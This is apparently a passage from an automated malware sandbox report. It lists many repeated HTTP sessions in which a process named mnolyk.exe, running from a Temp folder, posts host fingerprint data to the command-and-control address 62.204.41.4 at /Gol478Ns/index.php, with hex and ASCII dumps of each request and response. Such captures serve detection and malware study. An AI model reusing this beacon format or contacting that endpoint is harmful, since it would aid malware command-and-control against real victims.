                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:10.336535931 CET | 787 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            6 | 192.168.2.4 | 49701 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:25.852741003 CET | 195 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:25.916302919 CET | 195 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            60 | 192.168.2.4 | 49755 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:41.418675900 CET | 249 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:41.481945038 CET | 249 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            600 | 192.168.2.4 | 50295 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:10.522022009 CET | 788 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:10.586210966 CET | 788 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            601 | 192.168.2.4 | 50296 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:10.763881922 CET | 789 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:10.827420950 CET | 789 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            602 | 192.168.2.4 | 50297 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:11.003849983 CET | 790 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:11.070122004 CET | 790 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            603 | 192.168.2.4 | 50298 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:11.262830019 CET | 791 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:11.327487946 CET | 791 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            604 | 192.168.2.4 | 50299 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:11.500143051 CET | 792 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:11.562865973 CET | 792 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            605 | 192.168.2.4 | 50300 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:11.733230114 CET | 793 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:11.798274994 CET | 793 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            606 | 192.168.2.4 | 50301 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:11.986985922 CET | 794 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:12.053431988 CET | 794 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            607 | 192.168.2.4 | 50302 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:12.239778042 CET | 795 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:12.303134918 CET | 795 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            608 | 192.168.2.4 | 50303 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:12.489379883 CET | 796 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:12.552189112 CET | 796 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            609 | 192.168.2.4 | 50304 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:12.743685007 CET | 797 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:12.806556940 CET | 797 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            61 | 192.168.2.4 | 49756 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:41.670964956 CET | 250 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:41.734636068 CET | 250 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            610 | 192.168.2.4 | 50305 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:12.988862991 CET | 798 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:13.054493904 CET | 798 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:13 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            611 | 192.168.2.4 | 50306 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:13.234357119 CET | 799 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:13.299527884 CET | 799 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:13 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            612 | 192.168.2.4 | 50307 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:13.620719910 CET | 800 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:13.684689999 CET | 800 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:13 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            613 | 192.168.2.4 | 50308 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:13.941052914 CET | 801 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:14.005723000 CET | 801 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:13 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            614 | 192.168.2.4 | 50309 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:14.212817907 CET | 802 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:14.277204990 CET | 802 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:14 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            615 | 192.168.2.4 | 50310 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:15.001847029 CET | 803 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:15.067188978 CET | 803 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            616 | 192.168.2.4 | 50311 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:15.296989918 CET | 804 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:15.358453035 CET | 804 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
